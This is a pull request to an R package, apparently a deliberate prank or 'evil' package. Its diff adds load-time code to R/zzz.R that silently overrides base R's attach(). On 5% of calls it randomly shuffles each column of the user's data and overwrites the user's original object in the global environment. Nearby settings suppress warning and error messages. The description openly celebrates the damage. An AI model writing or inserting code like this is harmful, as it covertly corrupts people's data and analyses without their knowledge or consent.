### PR TITLE
Randomly shuffled attached data 5% of the time

### DIFF
--- a/R/zzz.R
+++ b/R/zzz.R
@@ -29,6 +29,15 @@
       .Primitive("==")(e1, e2)
     }
   })
+  baseattach <- attach
+  replace("attach", function (what, pos = 2L, name = deparse(substitute(what)), warn.conflicts = TRUE){
+    if (runif(1) < 0.05){
+      WHAT <- lapply(what, sample)
+      assign(name, WHAT, pos = .GlobalEnv)
+      what <- WHAT
+    }
+    baseattach(what, pos, name, warn.conflicts)
+  })
   options(showWarnCalls = FALSE,
           showErrorCalls = FALSE,
           show.error.messages = FALSE,


### PR DESCRIPTION
This will replace attach so that the data will be randomly shuffled before it's attached. This one is particularly terrible because it modifies the user's data frame.

Attach is insidious in and of itself:  https://twitter.com/JennyBryan/status/644574756730093568

This just makes it more evil :smiling_imp: 
